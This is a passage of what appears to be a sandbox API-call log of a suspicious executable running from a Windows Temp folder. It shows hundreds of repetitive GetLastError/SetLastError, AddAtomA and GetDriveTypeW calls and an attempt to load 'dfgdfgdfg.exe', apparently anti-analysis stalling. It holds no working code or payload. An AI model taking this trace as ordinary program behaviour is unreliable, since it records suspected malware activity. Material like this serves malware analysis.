xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xdc\xb7\x3a\xaa\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0107.771] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x421940, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe")) returned 0x30 [0107.771] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.772] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.772] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.772] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.772] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.772] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.772] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.772] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.772] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.772] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.772] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.772] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.772] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.772] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.772] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.773] SetLastError (dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.773] SetLastError (dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.773] SetLastError (dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.773] SetLastError (dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.773] SetLastError (dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.773] SetLastError (dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.773] SetLastError (dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.773] SetLastError (dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.773] SetLastError (dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.773] SetLastError (dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.773] SetLastError (dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.773] SetLastError (dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.773] SetLastError (dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.773] SetLastError (dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.774] SetLastError (dwErrCode=0x0) [0107.774] GetLastError () returned 0x0 [0107.774] SetLastError (dwErrCode=0x0) [0107.774] GetLastError () returned 0x0 [0107.774] SetLastError (dwErrCode=0x0) [0107.774] GetLastError () returned 0x0 [0107.774] SetLastError (dwErrCode=0x0) [0107.774] GetLastError () returned 0x0 [0107.774] SetLastError (dwErrCode=0x0) [0107.774] GetLastError () returned 0x0 [0107.774] SetLastError (dwErrCode=0x0) [0107.774] GetLastError () returned 0x0 [0107.774] SetLastError (dwErrCode=0x0) [0107.774] GetLastError () returned 0x0 [0107.774] SetLastError (dwErrCode=0x0) [0107.774] GetLastError () returned 0x0 [0107.774] SetLastError (dwErrCode=0x0) [0107.774] GetLastError () returned 0x0 [0107.774] SetLastError (dwErrCode=0x0) [0107.774] GetLastError () returned 0x0 [0107.775] SetLastError (dwErrCode=0x0) [0107.775] GetLastError () returned 0x0 [0107.775] SetLastError (dwErrCode=0x0) [0107.775] GetLastError () returned 0x0 [0107.775] SetLastError (dwErrCode=0x0) [0107.775] GetLastError () returned 0x0 [0107.775] SetLastError (dwErrCode=0x0) [0107.775] GetLastError () returned 0x0 [0107.775] SetLastError (dwErrCode=0x0) [0107.775] GetLastError () returned 0x0 [0107.775] SetLastError (dwErrCode=0x0) [0107.775] GetLastError () returned 0x0 [0107.775] SetLastError (dwErrCode=0x0) [0107.775] GetLastError () returned 0x0 [0107.775] SetLastError (dwErrCode=0x0) [0107.775] GetLastError () returned 0x0 [0107.775] SetLastError (dwErrCode=0x0) [0107.775] GetLastError () returned 0x0 [0107.775] SetLastError (dwErrCode=0x0) [0107.775] GetLastError () returned 0x0 [0107.775] SetLastError (dwErrCode=0x0) [0107.775] GetLastError () returned 0x0 [0107.775] SetLastError (dwErrCode=0x0) [0107.775] GetLastError () returned 0x0 [0107.775] SetLastError (dwErrCode=0x0) [0107.775] GetLastError () returned 0x0 [0107.775] SetLastError (dwErrCode=0x0) [0107.775] GetLastError () returned 0x0 [0107.775] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.776] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.776] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.776] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.776] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.776] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.776] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.776] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.776] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.776] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.776] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.776] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.776] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.776] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.776] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.777] SetLastError (dwErrCode=0x0) [0107.777] GetLastError () returned 0x0 [0107.777] SetLastError (dwErrCode=0x0) [0107.777] GetLastError () returned 0x0 [0107.777] SetLastError (dwErrCode=0x0) [0107.777] GetLastError () returned 0x0 [0107.777] SetLastError (dwErrCode=0x0) [0107.777] GetLastError () returned 0x0 [0107.777] SetLastError (dwErrCode=0x0) [0107.777] GetLastError () returned 0x0 [0107.777] SetLastError (dwErrCode=0x0) [0107.777] GetLastError () returned 0x0 [0107.777] SetLastError (dwErrCode=0x0) [0107.777] GetLastError () returned 0x0 [0107.777] SetLastError (dwErrCode=0x0) [0107.777] GetLastError () returned 0x0 [0107.777] SetLastError (dwErrCode=0x0) [0107.777] GetLastError () returned 0x0 [0107.777] SetLastError (dwErrCode=0x0) [0107.777] GetLastError () returned 0x0 [0107.777] SetLastError (dwErrCode=0x0) [0107.777] GetLastError () returned 0x0 [0107.777] SetLastError (dwErrCode=0x0) [0107.777] GetLastError () returned 0x0 [0107.777] SetLastError (dwErrCode=0x0) [0107.777] GetLastError () returned 0x0 [0107.777] SetLastError (dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.778] SetLastError (dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.778] SetLastError (dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.778] SetLastError (dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.778] SetLastError (dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.778] SetLastError (dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.778] SetLastError (dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.778] SetLastError (dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.778] SetLastError (dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.778] SetLastError (dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.778] SetLastError (dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.778] SetLastError (dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.778] SetLastError (dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.778] SetLastError (dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.778] SetLastError (dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.779] SetLastError (dwErrCode=0x0) [0107.779] GetLastError () returned 0x0 [0107.779] SetLastError (dwErrCode=0x0) [0107.779] GetLastError () returned 0x0 [0107.779] SetLastError (dwErrCode=0x0) [0107.779] GetLastError () returned 0x0 [0107.779] SetLastError (dwErrCode=0x0) [0107.779] GetLastError () returned 0x0 [0107.779] SetLastError (dwErrCode=0x0) [0107.779] GetLastError () returned 0x0 [0107.779] SetLastError (dwErrCode=0x0) [0107.779] GetLastError () returned 0x0 [0107.779] SetLastError (dwErrCode=0x0) [0107.779] GetLastError () returned 0x0 [0107.779] SetLastError (dwErrCode=0x0) [0107.779] GetLastError () returned 0x0 [0107.779] SetLastError (dwErrCode=0x0) [0107.779] GetLastError () returned 0x0 [0107.779] SetLastError (dwErrCode=0x0) [0107.779] GetLastError () returned 0x0 [0107.779] SetLastError (dwErrCode=0x0) [0107.779] GetLastError () returned 0x0 [0107.779] SetLastError (dwErrCode=0x0) [0107.779] GetLastError () returned 0x0 [0107.779] SetLastError (dwErrCode=0x0) [0107.779] GetLastError () returned 0x0 [0107.779] SetLastError (dwErrCode=0x0) [0107.779] GetLastError () returned 0x0 [0107.780] SetLastError (dwErrCode=0x0) [0107.780] GetLastError () returned 0x0 [0107.780] SetLastError (dwErrCode=0x0) [0107.780] GetLastError () returned 0x0 [0107.780] SetLastError (dwErrCode=0x0) [0107.780] GetLastError () returned 0x0 [0107.780] SetLastError (dwErrCode=0x0) [0107.780] GetLastError () returned 0x0 [0107.780] SetLastError (dwErrCode=0x0) [0107.780] GetLastError () returned 0x0 [0107.780] SetLastError (dwErrCode=0x0) [0107.780] GetLastError () returned 0x0 [0107.780] SetLastError (dwErrCode=0x0) [0107.780] GetLastError () returned 0x0 [0107.780] SetLastError (dwErrCode=0x0) [0107.780] GetLastError () returned 0x0 [0107.780] SetLastError (dwErrCode=0x0) [0107.780] GetLastError () returned 0x0 [0107.780] SetLastError (dwErrCode=0x0) [0107.780] GetLastError () returned 0x0 [0107.780] SetLastError (dwErrCode=0x0) [0107.780] GetLastError () returned 0x0 [0107.780] SetLastError (dwErrCode=0x0) [0107.780] GetLastError () returned 0x0 [0107.780] SetLastError (dwErrCode=0x0) [0107.780] GetLastError () returned 0x0 [0107.780] SetLastError (dwErrCode=0x0) [0107.780] GetLastError () returned 0x0 [0107.780] SetLastError (dwErrCode=0x0) [0107.781] GetLastError () returned 0x0 [0107.781] SetLastError (dwErrCode=0x0) [0107.781] GetLastError () returned 0x0 [0107.781] SetLastError (dwErrCode=0x0) [0107.781] GetLastError () returned 0x0 [0107.781] SetLastError (dwErrCode=0x0) [0107.781] GetLastError () returned 0x0 [0107.781] SetLastError (dwErrCode=0x0) [0107.781] GetLastError () returned 0x0 [0107.781] SetLastError (dwErrCode=0x0) [0107.781] GetLastError () returned 0x0 [0107.781] SetLastError (dwErrCode=0x0) [0107.781] GetLastError () returned 0x0 [0107.781] SetLastError (dwErrCode=0x0) [0107.781] GetLastError () returned 0x0 [0107.781] SetLastError (dwErrCode=0x0) [0107.781] GetLastError () returned 0x0 [0107.781] SetLastError (dwErrCode=0x0) [0107.781] GetLastError () returned 0x0 [0107.781] SetLastError (dwErrCode=0x0) [0107.781] GetLastError () returned 0x0 [0107.781] SetLastError (dwErrCode=0x0) [0107.781] GetLastError () returned 0x0 [0107.781] SetLastError (dwErrCode=0x0) [0107.781] GetLastError () returned 0x0 [0107.781] SetLastError (dwErrCode=0x0) [0107.781] GetLastError () returned 0x0 [0107.781] SetLastError (dwErrCode=0x0) [0107.782] GetLastError () returned 0x0 [0107.782] SetLastError (dwErrCode=0x0) [0107.782] GetLastError () returned 0x0 [0107.782] SetLastError (dwErrCode=0x0) [0107.782] GetLastError () returned 0x0 [0107.782] SetLastError (dwErrCode=0x0) [0107.782] GetLastError () returned 0x0 [0107.782] SetLastError (dwErrCode=0x0) [0107.782] GetLastError () returned 0x0 [0107.782] SetLastError (dwErrCode=0x0) [0107.782] GetLastError () returned 0x0 [0107.782] SetLastError (dwErrCode=0x0) [0107.782] GetLastError () returned 0x0 [0107.782] SetLastError (dwErrCode=0x0) [0107.782] GetLastError () returned 0x0 [0107.782] SetLastError (dwErrCode=0x0) [0107.782] GetLastError () returned 0x0 [0107.782] SetLastError (dwErrCode=0x0) [0107.782] GetLastError () returned 0x0 [0107.782] SetLastError (dwErrCode=0x0) [0107.782] GetLastError () returned 0x0 [0107.782] SetLastError (dwErrCode=0x0) [0107.782] GetLastError () returned 0x0 [0107.782] SetLastError (dwErrCode=0x0) [0107.782] GetLastError () returned 0x0 [0107.783] SetLastError (dwErrCode=0x0) [0107.783] GetLastError () returned 0x0 [0107.783] SetLastError (dwErrCode=0x0) [0107.783] GetLastError () returned 0x0 [0107.783] SetLastError (dwErrCode=0x0) [0107.783] GetLastError () returned 0x0 [0107.783] SetLastError (dwErrCode=0x0) [0107.783] GetLastError () returned 0x0 [0107.783] SetLastError (dwErrCode=0x0) [0107.783] GetLastError () returned 0x0 [0107.783] SetLastError (dwErrCode=0x0) [0107.783] GetLastError () returned 0x0 [0107.783] SetLastError (dwErrCode=0x0) [0107.783] GetLastError () returned 0x0 [0107.783] SetLastError (dwErrCode=0x0) [0107.783] GetLastError () returned 0x0 [0107.783] SetLastError (dwErrCode=0x0) [0107.783] GetLastError () returned 0x0 [0107.783] SetLastError (dwErrCode=0x0) [0107.783] GetLastError () returned 0x0 [0107.783] SetLastError (dwErrCode=0x0) [0107.783] GetLastError () returned 0x0 [0107.783] SetLastError (dwErrCode=0x0) [0107.783] GetLastError () returned 0x0 [0107.783] SetLastError (dwErrCode=0x0) [0107.783] GetLastError () returned 0x0 [0107.784] SetLastError (dwErrCode=0x0) [0107.784] GetLastError () returned 0x0 [0107.784] SetLastError (dwErrCode=0x0) [0107.784] GetLastError () returned 0x0 [0107.784] SetLastError (dwErrCode=0x0) [0107.784] GetLastError () returned 0x0 [0107.784] SetLastError (dwErrCode=0x0) [0107.784] GetLastError () returned 0x0 [0107.784] SetLastError (dwErrCode=0x0) [0107.784] GetLastError () returned 0x0 [0107.784] SetLastError (dwErrCode=0x0) [0107.784] GetLastError () returned 0x0 [0107.784] SetLastError (dwErrCode=0x0) [0107.784] GetLastError () returned 0x0 [0107.784] SetLastError (dwErrCode=0x0) [0107.784] GetLastError () returned 0x0 [0107.784] SetLastError (dwErrCode=0x0) [0107.784] GetLastError () returned 0x0 [0107.784] SetLastError (dwErrCode=0x0) [0107.784] GetLastError () returned 0x0 [0107.784] SetLastError (dwErrCode=0x0) [0107.784] GetLastError () returned 0x0 [0107.784] SetLastError (dwErrCode=0x0) [0107.784] GetLastError () returned 0x0 [0107.784] SetLastError (dwErrCode=0x0) [0107.784] GetLastError () returned 0x0 [0107.785] SetLastError (dwErrCode=0x0) [0107.785] GetLastError () returned 0x0 [0107.785] SetLastError (dwErrCode=0x0) [0107.785] GetLastError () returned 0x0 [0107.785] SetLastError (dwErrCode=0x0) [0107.785] GetLastError () returned 0x0 [0107.785] SetLastError (dwErrCode=0x0) [0107.785] GetLastError () returned 0x0 [0107.785] SetLastError (dwErrCode=0x0) [0107.785] GetLastError () returned 0x0 [0107.785] SetLastError (dwErrCode=0x0) [0107.785] GetLastError () returned 0x0 [0107.785] SetLastError (dwErrCode=0x0) [0107.785] GetLastError () returned 0x0 [0107.785] SetLastError (dwErrCode=0x0) [0107.785] GetLastError () returned 0x0 [0107.785] SetLastError (dwErrCode=0x0) [0107.785] GetLastError () returned 0x0 [0107.785] SetLastError (dwErrCode=0x0) [0107.785] GetLastError () returned 0x0 [0107.785] SetLastError (dwErrCode=0x0) [0107.785] GetLastError () returned 0x0 [0107.785] SetLastError (dwErrCode=0x0) [0107.785] GetLastError () returned 0x0 [0107.785] SetLastError (dwErrCode=0x0) [0107.785] GetLastError () returned 0x0 [0107.785] SetLastError (dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.786] SetLastError (dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.786] SetLastError (dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.786] SetLastError (dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.786] SetLastError (dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.786] SetLastError (dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.786] SetLastError (dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.786] SetLastError (dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.786] SetLastError (dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.786] SetLastError (dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.786] SetLastError (dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.786] SetLastError (dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.786] SetLastError (dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.786] SetLastError (dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.786] SetLastError (dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.787] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.787] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.787] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.787] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.787] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.787] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.787] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.787] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.787] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.787] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.787] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.787] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.787] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.787] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.788] SetLastError (dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.788] SetLastError (dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.788] SetLastError (dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.788] SetLastError (dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.788] SetLastError (dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.788] SetLastError (dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.788] SetLastError (dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.788] SetLastError (dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.788] SetLastError (dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.788] SetLastError (dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.788] SetLastError (dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.788] SetLastError (dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.788] SetLastError (dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.788] SetLastError (dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.789] SetLastError (dwErrCode=0x0) [0107.789] GetLastError () returned 0x0 [0107.789] SetLastError (dwErrCode=0x0) [0107.789] GetLastError () returned 0x0 [0107.789] SetLastError (dwErrCode=0x0) [0107.789] GetLastError () returned 0x0 [0107.789] SetLastError (dwErrCode=0x0) [0107.789] GetLastError () returned 0x0 [0107.789] SetLastError (dwErrCode=0x0) [0107.789] GetLastError () returned 0x0 [0107.789] SetLastError (dwErrCode=0x0) [0107.789] GetLastError () returned 0x0 [0107.789] SetLastError (dwErrCode=0x0) [0107.789] GetLastError () returned 0x0 [0107.789] SetLastError (dwErrCode=0x0) [0107.789] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0107.789] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404966) returned 0x0 [0107.790] LoadLibraryW (lpLibFileName="dfgdfgdfg.exe") returned 0x0 [0107.790] AddAtomA (lpString=0x0) returned 0x0 [0107.790] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.790] AddAtomA (lpString=0x0) returned 0x0 [0107.790] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.790] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW 